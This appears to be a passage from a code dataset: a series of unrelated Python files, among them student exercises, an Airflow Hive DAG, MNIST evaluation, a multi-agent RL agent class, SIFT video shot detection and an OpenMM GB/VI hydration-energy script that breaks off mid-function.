        self.sendCmd("createInclusiveSelectionCriterion", name, nb)

    def createExclusiveCriterion(self, name, nb):
        """Declare an exclusive selection criterion (nb is passed as a string)."""
        self.sendCmd("createExclusiveSelectionCriterion", name, nb)

    # Starts the Pfw
    def start(self):
        """Send "start" to the parameter framework through the HAL."""
        self.sendCmd("start")
# A PfwTestCase gather tests performed on one instance of the PFW.
class PfwTestCase(unittest.TestCase):
    """Base test case: boots one shared HAL + parameter framework per class.

    setUpClass/tearDownClass manage the class-level `hal` instance, so every
    test method of a subclass runs against the same framework instance.
    """
    hal = Hal()

    def __init__(self, argv):
        super(PfwTestCase, self).__init__(argv)
        self.pfw = Pfw()

    @classmethod
    def setUpClass(cls):
        cls.startHal()

    @classmethod
    def tearDownClass(cls):
        cls.stopHal()

    @classmethod
    def startHal(cls):
        # set up the Hal & pfw
        cls.hal.startHal()
        # Give the freshly spawned process time to open its sockets.
        time.sleep(0.1)
        # create criterions
        cls.hal.createInclusiveCriterion("Crit_0", "2")
        cls.hal.createExclusiveCriterion("Crit_1", "2")
        # start the Pfw
        cls.hal.start()

    @classmethod
    def stopHal(cls):
        cls.hal.stopHal()
        # Allow the process a moment to shut down before the next class starts.
        time.sleep(0.1)
|
7,153 | 62857a015087500fec534ba1297d42a33ae61927 | import testr
import testg
import time
def run():
    """Load an OpenRAVE scene and run navigation -> grasp planning -> navigation."""
    parser = testg.OptionParser(description='Autonomous grasp and manipulation planning example.')
    parser.add_option('--scene',
                      action="store",type='string',dest='scene',default='/home/user/experiment/data/lab1.env.xml',
                      help='Scene file to load (default=%default)')
    parser.add_option('--nodestinations', action='store_true',dest='nodestinations',default=False,
                      help='If set, will plan without destinations.')
    parser.add_option('--norandomize', action='store_false',dest='randomize',default=True,
                      help='If set, will not randomize the bodies and robot position in the scene.')
    (options, args) = parser.parse_args()
    env = testg.Environment()
    try:
        env.SetViewer('qtcoin')
        env.Load(options.scene)
        robot = env.GetRobots()[0]
        env.UpdatePublishedBodies()
        time.sleep(0.1) # give time for environment to update
        SNP = testr.SimpleNavigationPlanning(robot)
        SNP.performNavigationPlanning()
        GP= testg.GraspPlanning(robot,randomize=options.randomize,nodestinations=options.nodestinations)
        GP.performGraspPlanning()
        # Navigate again after the grasp phase has completed.
        SNP = testr.SimpleNavigationPlanning(robot)
        SNP.performNavigationPlanning()
    finally:
        # Always tear the environment down, even if planning failed.
        env.Destroy()

if __name__ == "__main__":
    run()
|
7,154 | 6b731e329eec3947a17ef8ee8280f2ddf980c81c | print("Praktikum Programa Komputer ")
print("Exercise 7.21")
print("")
print("===========================")
print("Nama : Ivanindra Rizky P")
print("NIM : I0320054")
print("")
print("===========================")
print("")
import random
a = [23, 45, 98, 36]
print('a = ', a)
print('random 1')
print('choice = ', random.choice(a))
print('random 2')
print('choice = ', random.choice(a))
print('random 3')
print('choice = ', random.choice(a)) |
7,155 | 49492ad1a1734be02ebefb77095fd560a7a7efd8 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import airflow
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from airflow.operators import BashOperator, DummyOperator
from datetime import datetime, timedelta
# --------------------------------------------------------------------------------
# set default arguments
# --------------------------------------------------------------------------------
# Default task arguments applied to every task in the DAG.
default_args = {
    'owner': 'Jaimin',
    'depends_on_past': False,
    # NOTE(review): a dynamic start_date (datetime.now()) is re-evaluated on
    # every DAG-file parse — confirm a fixed start date is not required.
    'start_date': datetime.now(),
    'email': ['airflow@airflow.com'],
    'email_on_failure': False,
    'email_on_retry': False,
    'retries': 1,
    'retry_delay': timedelta(minutes=5),
    # 'queue': 'bash_queue',
    # 'pool': 'backfill',
    # 'priority_weight': 10,
    # 'end_date': datetime(2016, 1, 1),
}

# Daily DAG (01:00) that creates Hive partitions; at most one task at a time.
dag = DAG(
    'hive_create_part_v1',
    default_args=default_args,
    schedule_interval="0 1 * * *",
    concurrency=1)

# --------------------------------------------------------------------------------
# set tasks
# --------------------------------------------------------------------------------
# Single task: run the partition-creation shell script on host "mnode2".
task = BashOperator(
    task_id='hive_create_parition',
    bash_command='bash /data/appdata/airflow/script/hive_create_job.sh mnode2 ',
    dag=dag)
|
7,156 | c2d8e34ab0b449a971c920fc86f259f093f16cc5 | import sys, os
sys.path.append(os.pardir)  # allow importing modules from the parent directory

import numpy as np
from dataset.mnist import load_mnist
from controller import Controller

# Load MNIST (normalized pixels, one-hot labels).
(x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)

# instance
controller = Controller()

# accuracy
trycount = 1000
accuracy_cnt = 0
# result[p][a]: confusion matrix counting predicted class p vs actual class a.
result = np.zeros((10, 10))
for i in range(len(x_test)):
    # p: predicted label index returned by controller.accuracy — presumably
    # the argmax class; confirm against the Controller implementation.
    p = controller.accuracy(x_test[i])
    a = np.argmax(t_test[i])
    #print("p = " + str(p))
    #print("a = " + str(a))
    result[p][a] += 1
    #print(t_test[i])
    if p == a:
        accuracy_cnt += 1
    # NOTE(review): the loop processes indices 0..trycount inclusive
    # (trycount + 1 samples) while the accuracy below divides by trycount —
    # off by one sample; confirm the intended denominator.
    if (i == trycount):
        break
print("Accuracy:" + str(float(accuracy_cnt) / trycount))
print(result)
|
7,157 | d3a22cad850e895950ce322aac393b31758a2237 | def SimpleSymbols(str):
if str[0].isalpha() and str[-1].isalpha():
return "false"
for i in range(0, len(str)):
if str[i].isalpha():
if str[i-1] == '+' and str[i+1] == '+':
return "true"
return "false"
# keep this function call here
# to see how to enter arguments in Python scroll down
# NOTE: print-statement / raw_input syntax — this entry line targets Python 2.
print SimpleSymbols(raw_input())
|
# Draw a 7x5 grid of '*' / ' ' cells: the first column and every third row
# (rows 0, 3, 6) are stars, producing an "E"-like figure.
for row in range(7):
    cells = ["*" if (col == 0) or (row % 3 == 0) else " " for col in range(5)]
    # Each cell is followed by one space, matching the cell-by-cell output
    # of a print(..., end=" ") loop.
    print(" ".join(cells) + " ")
|
7,159 | 41e642c4acb212470577ef43908a1dcf2e0f5730 | import glob
from collections import defaultdict
from stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset
# class label -> list of training samples gathered from all ALTO files.
data = defaultdict(list)
# image identifier -> the per-class samples extracted from its ALTO file.
images = {}
for xml_path in glob.glob("./input/**/*.xml", recursive=True):
    current, image = read_alto_for_training(xml_path)
    images[image] = current
    for key in current:
        data[key].extend(current[key])

# Track the size of the rarest class so the split can be capped against it.
minimum = float("inf")
for cls in data:
    # NOTE(review): `total` is loop-invariant and recomputed every iteration —
    # could be hoisted above the loop.
    total = sum([len(val) for val in data.values()])
    print(f"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})")
    minimum = min([len(data[cls]), minimum])

# Extract images
extract_images_from_bbox_dict_for_training(images, output_dir="./data/")

# Split into dataset
split_dataset("./data/*", max_size=minimum, except_for_train=True)
|
7,160 | e4b49faaad648c6e85274abb18f994083a74013d | import numpy as np
# Weights for the four categories.
catogory = np.array([50, 30, 40, 20])

# 4x5 data matrix (one row per category).
data = np.array([
    [20, 50, 10, 15, 20],
    [30, 40, 20, 65, 35],
    [75, 30, 42, 70, 45],
    [40, 25, 35, 22, 55],
])

print(catogory)
print(data)
# Both matrix products yield the same 1-D weighted column totals.
print(catogory @ data)
print(data.T @ catogory)
|
7,161 | 45f9d5ac0fa7d9259c1d53b92c030559f3bfda89 | #-*- coding: utf8 -*-
#Programa: 04-palindromo
#Objetivo:Un Numero Palindromo es aquel numero que se lee igual, de izquierda a derecha y viceversa
#El palindromo mas grande que se puede obtener por el producto de dos numeros de dos digitos
# es: 9009 que es igual a 91x99.
#Encuentre el palindromo mas grande que se pueda encontrar por el producto de dos numeros de tres digitos.
#Recomendacion: tratar de hacerlo con el ejemplo siempre.
#Autor: Fernando Martinez
#Fecha: 28 enero de 2020
def obtener_palindromo(valor):
    """Return True if the decimal digits of *valor* form a palindrome, else False.

    The previous version compared a reversed copy of a digit list against an
    accidental alias of the same list and returned None (not False) for
    non-palindromes; this version compares the string form against its
    reverse and always returns a real boolean.
    """
    texto = str(valor)
    return texto == texto[::-1]
def multiplicaciones():
    """Return the largest palindrome expressible as the product of two
    three-digit numbers (906609 = 913 x 993).

    Improvements over the naive double loop:
    - the inner loop starts at the outer value, since a*b == b*a makes the
      other half of the product space redundant;
    - the cheap "larger than the best so far?" test runs before the more
      expensive palindrome test, so few products are ever stringified.
    """
    ultimo_palindromo = 0
    for primer_numero in range(100, 1000):
        for segundo_numero in range(primer_numero, 1000):
            total = primer_numero * segundo_numero
            if total > ultimo_palindromo:
                texto = str(total)
                if texto == texto[::-1]:
                    ultimo_palindromo = total
    return ultimo_palindromo
# Entry point: print the largest palindrome made from two 3-digit factors.
if __name__ == "__main__":
    print(multiplicaciones())
|
def get_value(li, row, column):
    """Return li[row][column], or 0 for any position outside the grid.

    Negative indices are treated as out of bounds, never as Python
    wrap-around indexing.
    """
    if row >= 0 and column >= 0:
        try:
            return li[row][column]
        except IndexError:
            pass
    return 0
# Number of test cases.
n = int(input())
results = {}
for asdf in range(n):
    table = []
    title, rows, columns = input().split()
    rows = int(rows)
    columns = int(columns)
    for r in range(rows):
        table.append([int(x) for x in input().split()])
    # Visit cells in ascending order of value: `sort` lists the flat indices
    # of the grid sorted by cell value.
    flattened = [j for sub in table for j in sub]
    sort = sorted(range(len(flattened)), key=lambda k: flattened[k])
    # distance[r][c]: best path length ending at (r, c) computed so far.
    distance = [[0 for i in range(columns)] for j in range(rows)]
    #print(sort)
    maxdist = 0
    for i in sort:
        # Convert the flat index back to (row, col).
        r = i//columns
        c = i % columns
        #print(r)
        #print(c)
        # w/x/y/z mask out neighbours holding the SAME value, so only
        # strictly different-valued neighbours contribute below.
        w = 1
        x = 1
        y = 1
        z = 1
        if get_value(table, r, c) == get_value(table, r-1, c):
            w = 0
        if get_value(table, r, c) == get_value(table, r+1, c):
            x = 0
        if get_value(table, r, c) == get_value(table, r, c-1):
            y = 0
        if get_value(table, r, c) == get_value(table, r, c+1):
            z = 0
        #print(distance)
        # Best neighbouring path (out-of-grid neighbours read as 0) + this cell.
        distance[r][c] = max(max(get_value(distance, r-1, c)*w, get_value(distance, r+1, c)*x),
                             max(get_value(distance, r, c-1)*y, get_value(distance, r, c+1)*z)) + 1
        if distance[r][c] > maxdist:
            maxdist = distance[r][c]
    # NOTE(review): this appears to compute the longest path of strictly
    # increasing cell values — confirm against the problem statement.
    results[title] = maxdist
for key in results:
    print(key + ": " + str(results[key]))
|
7,163 | 2df2cccc22aba2104ab15820e13d304addf83f63 | """slack_utils.py: slack-specific utilities"""
from os import path
import pprint

# Absolute directory containing this module.
HERE = path.abspath(path.dirname(__file__))
# Shared pretty-printer (indent=2) for debug dumps.
PP = pprint.PrettyPrinter(indent=2)
def parse_slack_message_object(message_obj):
    """Flatten a slack message object into a metadata dict with resolved
    user/channel/team names.

    Notes:
        `slackbot.message`.keys(): [type, channel, user, text, ts, source_team, team]

    Args:
        message_obj (:obj:`slackbot.message`): response object for slack

    Returns:
        dict: message data (raw body fields plus *_name keys)
    """
    metadata = dict(message_obj._body)
    client = message_obj._client
    try:
        metadata['channel_name'] = client.channels[metadata['channel']]['name']
    except KeyError:
        # A channel id missing from the channel map means a direct message.
        metadata['channel_name'] = 'DIRECT_MESSAGE:{}'.format(
            client.users[metadata['user']]['name'])
    metadata['user_name'] = client.users[metadata['user']]['name']
    metadata['team_name'] = client.login_data['team']['name']
    return metadata
def parse_discord_context_object(context_obj):
    """Flatten a discord context object into a metadata dict with resolved
    user/team/channel names.

    Args:
        context_obj (:obj:`discord.context`): response object for discord

    Returns:
        dict: standardized message data
    """
    message = context_obj.message
    metadata = dict()  # TODO: all context_obj.message.{children}.name values
    metadata['user_name'] = message.author.name
    metadata['team_name'] = message.server.name
    try:
        metadata['channel_name'] = message.channel.name
    except Exception:
        # Direct messages have no named channel.
        metadata['channel_name'] = 'DIRECT_MESSAGE:{}'.format(message.author.name)
    return metadata
|
7,164 | 845d04312abc0e64a7810b52bbee333d2bdf3dfb | from torch import Tensor
from torch.autograd import Variable
from torch.optim import Adam
from maac.utils.misc import hard_update, onehot_from_logits
from maac.utils.policies import DiscretePolicy
class AttentionAgent(object):
    """
    General class for Attention agents (policy, target policy)
    """
    def __init__(self,
                 num_in_pol,
                 num_out_pol,
                 hidden_dim=64,
                 lr=0.01,
                 onehot_dim=0):
        """
        Inputs:
            num_in_pol (int): number of dimensions for policy input
            num_out_pol (int): number of dimensions for policy output
            hidden_dim (int): forwarded to both DiscretePolicy networks
            lr (float): Adam learning rate for the policy optimizer
            onehot_dim (int): forwarded to both DiscretePolicy networks
        """
        self.policy = DiscretePolicy(num_in_pol,
                                     num_out_pol,
                                     hidden_dim=hidden_dim,
                                     onehot_dim=onehot_dim)
        self.target_policy = DiscretePolicy(num_in_pol,
                                            num_out_pol,
                                            hidden_dim=hidden_dim,
                                            onehot_dim=onehot_dim)
        # Start the target network as an exact copy of the live policy.
        hard_update(self.target_policy, self.policy)
        self.policy_optimizer = Adam(self.policy.parameters(), lr=lr)

    def step(self, obs, explore=False):
        """
        Take a step forward in environment for a minibatch of observations
        Inputs:
            obs (PyTorch Variable): Observations for this agent
            explore (boolean): Whether or not to sample
        Outputs:
            action (PyTorch Variable): Actions for this agent
        """
        return self.policy(obs, sample=explore)

    def get_params(self):
        """Return a snapshot dict of both networks' and the optimizer's state."""
        return {
            'policy': self.policy.state_dict(),
            'target_policy': self.target_policy.state_dict(),
            'policy_optimizer': self.policy_optimizer.state_dict()
        }

    def load_params(self, params):
        """Restore the state previously produced by get_params()."""
        self.policy.load_state_dict(params['policy'])
        self.target_policy.load_state_dict(params['target_policy'])
        self.policy_optimizer.load_state_dict(params['policy_optimizer'])
|
7,165 | 397d9b1030a1ec08d04d2101f65a83547495b861 | import numpy as np
import cv2
import os
from moviepy.editor import *
# Sample every N-th frame from ./frames.
N = 1

# Initiate SIFT detector
sift = cv2.xfeatures2d.SIFT_create()

# count file number in folder frames
# NOTE(review): `list` shadows the builtin of the same name.
list = os.listdir('./frames')
number_files = len(list)

# array to store similarity of 2 consecutive frames
similarity = []
# Indices of detected shot boundaries (in sampled-frame units).
boundaries = []
keypoints = []

#threshold
T = 0.5

# open file to write result
# file = open("result.txt", "w")

# FLANN matcher (algorithm 0 with 5 trees) used to match SIFT descriptors.
index_params = dict(algorithm = 0, trees = 5)
search_params = dict()
flann = cv2.FlannBasedMatcher(index_params, search_params)
# bf = cv2.BFMatcher()

# run loop
for i in range(0, number_files-N-1, N):
    img1 = cv2.imread('./frames/frame%d.jpg' %i, 0)
    img2 = cv2.imread('./frames/frame%d.jpg' %(i+N), 0)
    # find the keypoints and descriptors with SIFT
    kp1, des1 = sift.detectAndCompute(img1,None)
    kp2, des2 = sift.detectAndCompute(img2,None)
    if(len(keypoints) == 0):
        keypoints.append(kp1)
        keypoints.append(kp2)
    else:
        keypoints.append(kp2)
    matches = flann.knnMatch(des1, des2, k=2)
    print(i)
    # Apply ratio test
    if len(matches):
        good = []
        for m,n in matches:
            if m.distance < 0.6*n.distance:
                good.append(m)
        # Similarity = good matches relative to the average keypoint count.
        avg = (len(kp1) + len(kp2)) / 2
        if avg:
            ratio = len(good) / float(avg)
        else:
            ratio = 0
    else:
        ratio = 0
    similarity.append(ratio)

# A shot boundary is a local minimum of the similarity curve that is deeper
# than T times the surrounding local maxima.
n = len(similarity)
for i in range(1, n-2):
    if similarity[i] < similarity[i-1] and similarity[i] < similarity[i+1]:
        t = i-1
        r = i+1
        while similarity[t] < similarity[t-1]: t = t-1
        if r < n-2:
            while similarity[r] < similarity[r+1]: r = r+1
        if similarity[i] < similarity[t]*T or similarity[i] < similarity[r]*T:
            # file.write(str(i) + "\n")
            boundaries.append(i)
# file.close()

# Cut the source video at the detected boundaries, one clip per shot.
# NOTE(review): the division by 25 assumes a 25 fps source video — confirm.
video = VideoFileClip("test.mp4")
for i in range (len(boundaries)-2):
    clip_start = int(boundaries[i]) * N / float(25)
    clip_end = int(boundaries[i+1]) * N / float(25)
    clip = video.subclip(clip_start, clip_end)
    clip.write_videofile("./output/shot_%s.mp4" %i)
7,166 | 55252fc78c67e48c64e777e4c3a713c898312b81 | import pyenttec, math, time
# NOTE(review): `global` at module level is a no-op; the `port` object is
# actually created by run() below.
global port
# NOTE(review): MAX is unused in this excerpt — confirm intent.
MAX = 60
# Per-panel base DMX channel numbers; setColor() writes the colour
# components at base-1, base, base+1.
panels = [408, 401, 404, 16]
def render():
    """Flush the current channel values out of the DMX port opened by run()."""
    port.render()
def setColor(panel, color):
    """Write a 3-component colour to the DMX channels of *panel*.

    panel -- index into the module-level `panels` base-channel table
    color -- sequence of three channel values; written to channels
             base-1, base, base+1
    """
    base = panels[panel]
    # A zero/empty base entry means the panel is not patched; skip it.
    if base:
        for offset in range(3):
            port.set_channel(base - 1 + offset, color[offset])
def run(func):
    """Open a DMX port (interactive selection) and then invoke *func*.

    The opened port is stored in the module-level `port` that render()
    and setColor() rely on.
    """
    global port
    port = pyenttec.select_port()
    func()
|
7,167 | 0ac9e757fa827b311487169d0dc822951ce8c4bb | #!/usr/bin/env python
#=============================================================================================
# MODULE DOCSTRING
#=============================================================================================
"""
evaluate-gbvi.py
Evaluate the GBVI model on hydration free energies of small molecules for multiple iterations of the Markov chain.
"""
#=============================================================================================
# GLOBAL IMPORTS
#=============================================================================================
import sys,string
from openeye.oechem import *
from optparse import OptionParser # For parsing of command line arguments
import os
import math
import numpy
import simtk.openmm as openmm
import simtk.unit as units
import openeye.oechem
import openeye.oequacpac
import openeye.oeiupac
from openeye.oechem import *
from openeye.oequacpac import *
from openeye.oeszybki import *
from openeye.oeiupac import *
import time
import pymc
#=============================================================================================
# Load OpenMM plugins.
#=============================================================================================
print "Loading OpenMM plugins..."
openmm.Platform.loadPluginsFromDirectory(os.path.join(os.environ['OPENMM_INSTALL_DIR'], 'lib'))
openmm.Platform.loadPluginsFromDirectory(os.path.join(os.environ['OPENMM_INSTALL_DIR'], 'lib', 'plugins'))
#=============================================================================================
# Atom Typer
#=============================================================================================
class AtomTyper(object):
    """
    Atom typer

    Based on 'Patty', by Pat Walters.
    """

    class TypingException(Exception):
        """
        Atom typing exception: raised when an atom matches no SMARTS rule.
        """
        def __init__(self, molecule, atom):
            self.molecule = molecule
            self.atom = atom
        def __str__(self):
            return "Atom not assigned: %6d %8s" % (self.atom.GetIdx(), OEGetAtomicSymbol(self.atom.GetAtomicNum()))

    def __init__(self, infileName, tagname):
        """Load SMARTS -> type rules from *infileName*; typed atoms are
        tagged via the OE string tag *tagname*.

        NOTE(review): the input file handle `ifs` is never closed —
        consider a with-block.
        """
        self.pattyTag = OEGetTag(tagname)
        self.smartsList = []
        ifs = open(infileName)
        lines = ifs.readlines()
        for line in lines:
            # Strip trailing comments
            index = line.find('%')
            if index != -1:
                line = line[0:index]
            # Split into tokens.
            toks = string.split(line)
            if len(toks) == 2:
                smarts,type = toks
                pat = OESubSearch()
                pat.Init(smarts)
                pat.SetMaxMatches(0)
                self.smartsList.append([pat,type,smarts])

    def dump(self):
        """Print every (pattern, type, smarts) rule (debugging aid)."""
        for pat,type,smarts in self.smartsList:
            print pat,type,smarts

    def assignTypes(self,mol):
        """Assign a type tag to every atom of *mol*; raise TypingException
        if any atom matches no rule."""
        # Assign null types.
        for atom in mol.GetAtoms():
            atom.SetStringData(self.pattyTag, "")
        # Assign atom types using rules.
        OEAssignAromaticFlags(mol)
        for pat,type,smarts in self.smartsList:
            for matchbase in pat.Match(mol):
                for matchpair in matchbase.GetAtoms():
                    matchpair.target.SetStringData(self.pattyTag,type)
        # Check if any atoms remain unassigned.
        for atom in mol.GetAtoms():
            if atom.GetStringData(self.pattyTag)=="":
                raise AtomTyper.TypingException(mol, atom)

    def debugTypes(self,mol):
        """Print index / element / assigned type for every atom (debugging aid)."""
        for atom in mol.GetAtoms():
            print "%6d %8s %8s" % (atom.GetIdx(),OEGetAtomicSymbol(atom.GetAtomicNum()),atom.GetStringData(self.pattyTag))

    def getTypeList(self,mol):
        """Return the list of assigned type strings, one per atom of *mol*."""
        typeList = []
        for atom in mol.GetAtoms():
            typeList.append(atom.GetStringData(self.pattyTag))
        return typeList
#=============================================================================================
# Utility routines
#=============================================================================================
def read_gbvi_parameters(filename):
    """
    Read a GBVI parameter set from a file.

    ARGUMENTS

    filename (string) - the filename to read parameters from

    RETURNS

    parameters (dict) - maps '<atomtype>_radius' and '<atomtype>_gamma'
    to floats.

    Lines may carry trailing '%' comments; lines that do not contain
    exactly three whitespace-separated fields (atomtype, radius, gamma)
    are ignored.
    """
    parameters = dict()
    # 'with' guarantees the file handle is closed even if parsing raises
    # (the previous version leaked the open handle).
    with open(filename, 'r') as infile:
        for line in infile:
            # Strip trailing comments introduced by '%'.
            index = line.find('%')
            if index != -1:
                line = line[0:index]
            # Parse "atomtype radius gamma" records.
            elements = line.split()
            if len(elements) == 3:
                [atomtype, radius, gamma] = elements
                parameters['%s_%s' % (atomtype, 'radius')] = float(radius)
                parameters['%s_%s' % (atomtype, 'gamma')] = float(gamma)
    return parameters
#=============================================================================================
# Computation of hydration free energies
#=============================================================================================
def function(x):
    """Unpack a (molecule, parameters) tuple and compute its hydration energy.

    Top-level (hence picklable) wrapper used by multiprocessing.Pool.map in
    compute_hydration_energies_parallel.
    """
    (molecule, parameters) = x
    return compute_hydration_energy(molecule, parameters)
def compute_hydration_energies_parallel(molecules, parameters):
    """Compute hydration energies of all molecules on a local process pool.

    Returns a list of energies in the same order as *molecules*.
    """
    import multiprocessing

    # Create processor pool.
    # NOTE(review): the worker count is hard-coded to 8 — consider
    # multiprocessing.cpu_count().
    nprocs = 8
    pool = multiprocessing.Pool(processes=nprocs)

    # Pair each molecule with the shared parameter set for pool.map.
    x = list()
    for molecule in molecules:
        x.append( (molecule, parameters) )

    # Distribute calculation.
    results = pool.map(function, x)

    return results
def compute_hydration_energies(molecules, parameters):
    """
    Compute solvation energies of all specified molecules using given parameter set.

    ARGUMENTS

    molecules (list of OEMol) - molecules with atom types
    parameters (dict) - parameters for atom types

    RETURNS

    energies (dict) - energies[molecule] is the computed solvation energy of given molecule
    """

    # NOTE(review): keys are the OEMol objects themselves; the inline
    # comment below says "index" — confirm which is intended.
    energies = dict() # energies[index] is the computed solvation energy of molecules[index]

    # All evaluations run on the CPU Reference platform.
    platform = openmm.Platform.getPlatformByName("Reference")

    for molecule in molecules:
        # Create OpenMM System.
        system = openmm.System()
        for atom in molecule.GetAtoms():
            mass = OEGetDefaultMass(atom.GetAtomicNum())
            system.addParticle(mass * units.amu)

        # Add nonbonded term.
        #   nonbonded_force = openmm.NonbondedSoftcoreForce()
        #   nonbonded_force.setNonbondedMethod(openmm.NonbondedForce.NoCutoff)
        #   for atom in molecule.GetAtoms():
        #      charge = 0.0 * units.elementary_charge
        #      sigma = 1.0 * units.angstrom
        #      epsilon = 0.0 * units.kilocalories_per_mole
        #      nonbonded_force.addParticle(charge, sigma, epsilon)
        #   system.addForce(nonbonded_force)

        # Add GBVI term
        # gbvi_force = openmm.GBVISoftcoreForce()
        gbvi_force = openmm.GBVIForce()
        gbvi_force.setNonbondedMethod(openmm.GBVIForce.NoCutoff) # set no cutoff
        gbvi_force.setSoluteDielectric(1)
        gbvi_force.setSolventDielectric(78)

        # Use scaling method.
        # gbvi_force.setBornRadiusScalingMethod(openmm.GBVISoftcoreForce.QuinticSpline)
        # gbvi_force.setQuinticLowerLimitFactor(0.75)
        # gbvi_force.setQuinticUpperBornRadiusLimit(50.0*units.nanometers)

        # Build indexable list of atoms.
        atoms = [atom for atom in molecule.GetAtoms()]

        # Assign GB/VI parameters.
        for atom in molecule.GetAtoms():
            atomtype = atom.GetStringData("gbvi_type") # GBVI atomtype
            charge = atom.GetPartialCharge() * units.elementary_charge
            radius = parameters['%s_%s' % (atomtype, 'radius')] * units.angstroms
            gamma = parameters['%s_%s' % (atomtype, 'gamma')] * units.kilocalories_per_mole
            # gamma *= -1.0 # DEBUG
            lambda_ = 1.0 # fully interacting
            # gbvi_force.addParticle(charge, radius, gamma, lambda_) # for GBVISoftcoreForce
            gbvi_force.addParticle(charge, radius, gamma) # for GBVIForce

        # Add bonds.
        for bond in molecule.GetBonds():
            # Get atom indices.
            iatom = bond.GetBgnIdx()
            jatom = bond.GetEndIdx()
            # Get bond length.
            (xi, yi, zi) = molecule.GetCoords(atoms[iatom])
            (xj, yj, zj) = molecule.GetCoords(atoms[jatom])
            distance = math.sqrt((xi-xj)**2 + (yi-yj)**2 + (zi-zj)**2) * units.angstroms
            # Identify bonded atoms to GBVI.
            gbvi_force.addBond(iatom, jatom, distance)

        # Add the force to the system.
        system.addForce(gbvi_force)

        # Build coordinate array.
        natoms = len(atoms)
        coordinates = units.Quantity(numpy.zeros([natoms, 3]), units.angstroms)
        for (index,atom) in enumerate(atoms):
            (x,y,z) = molecule.GetCoords(atom)
            coordinates[index,:] = units.Quantity(numpy.array([x,y,z]),units.angstroms)

        # Create OpenMM Context.
        timestep = 1.0 * units.femtosecond # arbitrary
        integrator = openmm.VerletIntegrator(timestep)
        context = openmm.Context(system, integrator, platform)

        # Set the coordinates.
        context.setPositions(coordinates)

        # Get the energy
        state = context.getState(getEnergy=True)
        energies[molecule] = state.getPotentialEnergy()

    return energies
def compute_hydration_energy(molecule, parameters, platform_name="Reference"):
    """
    Compute hydration energy of a specified molecule given the specified GBVI parameter set.

    ARGUMENTS

    molecule (OEMol) - molecule with GBVI atom types
    parameters (dict) - parameters for GBVI atom types

    RETURNS

    energy (float) - hydration energy in kcal/mol
    """

    platform = openmm.Platform.getPlatformByName(platform_name)

    # Create OpenMM System.
    system = openmm.System()
    for atom in molecule.GetAtoms():
        mass = OEGetDefaultMass(atom.GetAtomicNum())
        system.addParticle(mass * units.amu)

    # Add GBVI term
    # gbvi_force = openmm.GBVISoftcoreForce()
    gbvi_force = openmm.GBVIForce()
    gbvi_force.setNonbondedMethod(openmm.GBVIForce.NoCutoff) # set no cutoff
    gbvi_force.setSoluteDielectric(1)
    gbvi_force.setSolventDielectric(78)

    # Use scaling method.
    # gbvi_force.setBornRadiusScalingMethod(openmm.GBVISoftcoreForce.QuinticSpline)
    # gbvi_force.setQuinticLowerLimitFactor(0.75)
    # gbvi_force.setQuinticUpperBornRadiusLimit(50.0*units.nanometers)

    # Build indexable list of atoms.
    atoms = [atom for atom in molecule.GetAtoms()]

    # Assign GB/VI parameters.
    for atom in molecule.GetAtoms():
        atomtype = atom.GetStringData("gbvi_type") # GBVI atomtype
        charge = atom.GetPartialCharge() * units.elementary_charge
        try:
            radius = parameters['%s_%s' % (atomtype, 'radius')] * units.angstroms
            gamma = parameters['%s_%s' % (atomtype, 'gamma')] * units.kilocalories_per_mole
        except Exception, exception:
            # Report which atomtype is missing before re-raising.
            print "Cannot find parameters for atomtype '%s' in molecule '%s'" % (atomtype, molecule.GetTitle())
            print parameters.keys()
            raise exception
        # gamma *= -1.0 # DEBUG
        lambda_ = 1.0 # fully interacting
        # gbvi_force.addParticle(charge, radius, gamma, lambda_) # for GBVISoftcoreForce
        gbvi_force.addParticle(charge, radius, gamma) # for GBVIForce

    # Add bonds.
    for bond in molecule.GetBonds():
        # Get atom indices.
        iatom = bond.GetBgnIdx()
        jatom = bond.GetEndIdx()
        # Get bond length.
        (xi, yi, zi) = molecule.GetCoords(atoms[iatom])
        (xj, yj, zj) = molecule.GetCoords(atoms[jatom])
        distance = math.sqrt((xi-xj)**2 + (yi-yj)**2 + (zi-zj)**2) * units.angstroms
        # Identify bonded atoms to GBVI.
        gbvi_force.addBond(iatom, jatom, distance)

    # Add the force to the system.
    system.addForce(gbvi_force)

    # Build coordinate array.
    natoms = len(atoms)
    coordinates = units.Quantity(numpy.zeros([natoms, 3]), units.angstroms)
    for (index,atom) in enumerate(atoms):
        (x,y,z) = molecule.GetCoords(atom)
        coordinates[index,:] = units.Quantity(numpy.array([x,y,z]),units.angstroms)

    # Create OpenMM Context.
    timestep = 1.0 * units.femtosecond # arbitrary
    integrator = openmm.VerletIntegrator(timestep)
    context = openmm.Context(system, integrator, platform)

    # Set the coordinates.
    context.setPositions(coordinates)

    # Get the energy
    state = context.getState(getEnergy=True)
    energy = state.getPotentialEnergy() / units.kilocalories_per_mole
    # NaN energies are replaced by a large positive penalty — presumably so
    # the sampling code rejects such parameter sets; confirm.
    if numpy.isnan(energy):
        energy = +1e6;
    return energy
def hydration_energy_factory(molecule):
    """Return a closure that computes the hydration free energy of *molecule*.

    The returned callable accepts GB/VI parameters as keyword arguments
    (matching the parents dict handed to pymc.Deterministic below) and
    evaluates compute_hydration_energy on the serial Reference platform.
    """
    def hydration_energy(**parameters):
        return compute_hydration_energy(molecule, parameters, platform_name="Reference")
    return hydration_energy
#=============================================================================================
# PyMC model
#=============================================================================================
def testfun(molecule_index, *x):
    # Debug helper: echo and return the molecule index, ignoring *x.
    # NOTE(review): appears to be leftover scaffolding for checking how PyMC
    # passes parents into a Deterministic -- not referenced in visible code.
    print molecule_index
    return molecule_index
def create_model(molecules, initial_parameters):
    """Build a PyMC (2.x) model dict for Bayesian GB/VI parameter fitting.

    initial_parameters maps '<atomtype>_<radius|gamma>' keys to initial
    values; each becomes a Uniform prior. For every molecule a Deterministic
    node computes its GB/VI hydration free energy from only the parameters
    its atom types actually use (to limit parents for caching), and a Normal
    likelihood ties it to the experimental 'dG(exp)' SD tag through a shared
    error scale sigma (sampled as log_sigma).

    Returns the model as a dict of PyMC stochastic/deterministic nodes.
    """
    # Define priors for parameters.
    model = dict()
    parameters = dict() # just the parameters (subset of model), for parent lookup
    for (key, value) in initial_parameters.iteritems():
        (atomtype, parameter_name) = key.split('_')
